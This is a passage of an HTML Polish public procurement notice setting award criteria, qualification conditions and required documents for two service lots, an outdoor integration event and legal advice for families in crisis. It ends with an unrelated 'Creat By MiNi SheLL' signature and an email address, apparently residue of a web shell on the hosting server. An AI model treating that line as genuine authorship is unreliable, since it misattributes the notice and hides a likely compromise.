prawnych w<br/>zakresie pomocy członkom rodzin dotkniętych kryzysem o wielkości 201 lub więcej godzin – zamawiający przyzna 30 pkt;<br/>Brak wskazania w ofercie (w formularzu ofertowym) doświadczenia osób skierowanych do realizacji zadania (przeprowadzonego<br/>doradztwa prawnego) będzie równoznaczne z brakiem minimalnej ilości przeprowadzonych szkoleń celem otrzymania dodatkowych<br/>punktów w tej sytuacji Wykonawca otrzyma 0 pkt.<br/>Jeżeli Wykonawca wskaże ilość przeprowadzonego doradztwa prawnego większą niż 500 h, do oceny ofert w kryterium<br/>„doświadczenie osób skierowanych do realizacji zadania” oferta otrzyma w tym kryterium oceny ofert 30 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego, mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach<br/>określonych w rozdziale 12 SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu:<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące odpowiedni do danej części:<br/>2.1 Część nr 1 – Jednodniowe plenerowe spotkanie warsztatowo - integracyjne<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>4) zdolności technicznej lub zawodowej<br/>a) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>doświadczenia tj., że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali<br/>należycie co najmniej dwie usługi w zakresie kompleksowej organizacji imprez plenerowych dla szerokiego grona<br/>publiczności (w szczególności o charakterze artystyczno-rozrywkowym, edukacyjnym, rekreacyjnym lub sportowym).<br/>b) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>dysponowania następującymi osobami zdolnymi do wykonania zamówienia , co najmniej jedną osobą posiadającą:<br/>1) wykształcenie wyższe oraz<br/>2)doświadczenie w osobistym organizacji i prowadzeniu w ostatnich 3-ech latach minimum 2 imprez plenerowych dla<br/>szerokiego grona publiczności (w szczególności o charakterze artystyczno-rozrywkowym, edukacyjnym, rekreacyjnym lub<br/>sportowym)<br/>3) wskazana osoba musi ponadto spełniać warunki określone w:<br/>- ustawie z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym,<br/>- ustawie z dnia 9 czerwca 2011 r. o wspieraniu rodziny i systemie pieczy zastępczej to jest w szczególności:<br/>- nie jest i nie była pozbawiona władzy rodzicielskiej oraz władza rodzicielska nie jest jej ograniczona ani zawieszona;<br/>- wypełnia obowiązek alimentacyjny – w przypadku gdy taki obowiązek w stosunku do niej wynika z tytułu<br/>egzekucyjnego;<br/>- nie była skazana prawomocnym wyrokiem za umyślne przestępstwo lub umyślne przestępstwo skarbowe;<br/>- nie figuruje w Rejestrze sprawców przestępstw na tle seksualnym prowadzonym przez Ministerstwo Sprawiedliwości;<br/>2.2. Część nr 2 Poradnictwo prawne.<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>4) zdolności technicznej lub zawodowej<br/>a) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>dysponowania następującymi osobami zdolnymi do wykonania zamówienia: co najmniej jedną osobą posiadającą:<br/>- wykształcenie wyższe oraz<br/>- posiada prawo do wykonywania zawodu radcy prawnego albo adwokata,<br/>- potwierdzone doświadczenie przy czym minimalne doświadczenie zawodowe w danej dziedzinie nie powinno być krótsze<br/>niż 2 lata,<br/>- doświadczenie w ostatnich 3 - ech latach w prowadzeniu minimum indywidualnych doradztw prawnych w zakresie pomocy<br/>członkom rodzin dotkniętych kryzysami, doświadczenie min. 100 godzin doradztwa <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1. oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu dla odpowiedniej części na którą Wykonawca składa<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275<br/>pkt 1 ustawy - Usługi<br/>ofertę – zgodnie z załącznikiem nr 2.1 do SWZ dla części nr 1, załącznikiem nr 2.2 do SWZ dla części nr 2,<br/>2. Oświadczenia, o którym mowa w pkt 14.1 SWZ, potwierdzające brak podstaw do wykluczenia, spełnianie warunków udziału w<br/>postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia.<br/>2. Dla odpowiedniej części na którą złożył wykonawca ofertę - wykazu usług wykonanych, a w przypadku świadczeń okresowych lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do<br/>udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te<br/>usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów<br/>– oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert<br/>albo wniosków o dopuszczenie do udziału w postępowaniu zgodnie z załącznikiem nr 5.1 do SWZ dla części nr 1, załącznikiem nr<br/>5.2 do SWZ dla części nr 2,<br/>W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno wspólne w/w oświadczenie.<br/>Dla odpowiedniej części na którą złożył wykonawca ofertę - wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami – zgodnie z załącznikiem nr 6.1 do SWZ dla części nr 1, załącznikiem nr 6.2 do SWZ dla części nr 2,<br/>W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno wspólne w/w oświadczenie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1. Oświadczenie o braku podstaw do wykluczenia z postępowania dla odpowiedniej części na którą Wykonawca składa ofertę -<br/>zgodnie z załącznikiem nr 3.1 do SWZ dla części nr 1, załącznikiem nr 3.2 do SWZ dla części nr 2,<br/>3. Oświadczenia, o którym mowa w pkt 14.1 SWZ, potwierdzające brak podstaw do wykluczenia, spełnianie warunków udziału w<br/>postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe.<br/>4. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia.<br/>5. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1). Dla odpowiedniej części na którą złożył wykonawca ofertę - Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o<br/>braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – z załącznikiem nr 8.1 do SWZ dla części nr 1,<br/>załącznikiem nr 8.2 do SWZ dla części nr 2</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składane przez wykonawców na daną część<br/>1. formularz ofertowy odpowiednio dla danej części na którą wykonawca składa ofertę przygotowany - zgodnie wzorami<br/>określonymi jako załącznik nr 1.1 do SWZ dla części nr 1, załącznik nr 1.2 do SWZ dla części nr 2,<br/>b) oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu odpowiednio dla danej części na którą<br/>wykonawca składa ofertę przygotowane - zgodnie wzorami określonymi jako załącznikiem nr 2.1 do SWZ dla części nr 1,<br/>załącznikiem nr 2.2 do SWZ dla części nr 2,<br/>1) oświadczenie o braku podstaw do wykluczenia z postępowania odpowiednio dla danej części na którą wykonawca składa<br/>ofertę przygotowane - zgodnie z załącznikiem nr 3.1 do SWZ dla części nr 1, załącznikiem nr 3.2 do SWZ dla części nr 2,<br/>pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(jeżeli dotyczy);<br/>3) zobowiązanie podmiotu udostępniającego zasoby Wykonawcy odpowiednio dla danej części na którą wykonawca składa<br/>ofertę przygotowany - zgodnie z załącznikiem nr 7.1 do SWZ dla części nr 1, załącznikiem nr 7.2 do SWZ dla części nr 2<br/>(jeżeli dotyczy);<br/>4) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnienie warunków udziału w postępowaniu – odpowiednio dla danej części na którą wykonawca składa<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>ofertę przygotowany zgodnie z załącznikiem nr 4.1 do SWZ dla części nr 1, załącznikiem nr 4.2 do SWZ dla części nr 2<br/>(jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Do oferty wspólnej Wykonawcy dołączają<br/>pełnomocnictwo.<br/>3. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje,<br/>korespondencję, itp.<br/>4. Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/>a) oferta wspólna powinna być sporządzona zgodnie z SWZ,<br/>b) sposób składania dokumentów w ofercie wspólnej:<br/>- dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia składa każdy z<br/>Wykonawców składających ofertę wspólną we własnym imieniu;<br/>- dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik<br/>Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną.<br/>5. Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę wspólną będą mieli<br/>obowiązek przedstawić Zamawiającemu umowę konsorcjum, zawierającą, co najmniej:<br/>a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację<br/>przedmiotu zamówienia,<br/>b) określenie zakresu działania poszczególnych stron umowy,<br/>c) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania<br/>gwarancji jakości i rękojmi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich prowadzenia zostały określone w projektowanych postanowieniach<br/>umowy stanowiących Załącznik nr 9.1 do SWZ -dla części nr 1, Załącznik nr 9.2 do SWZ - Projektowane dla części nr 2. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-28 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-c98c3f07-6766-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com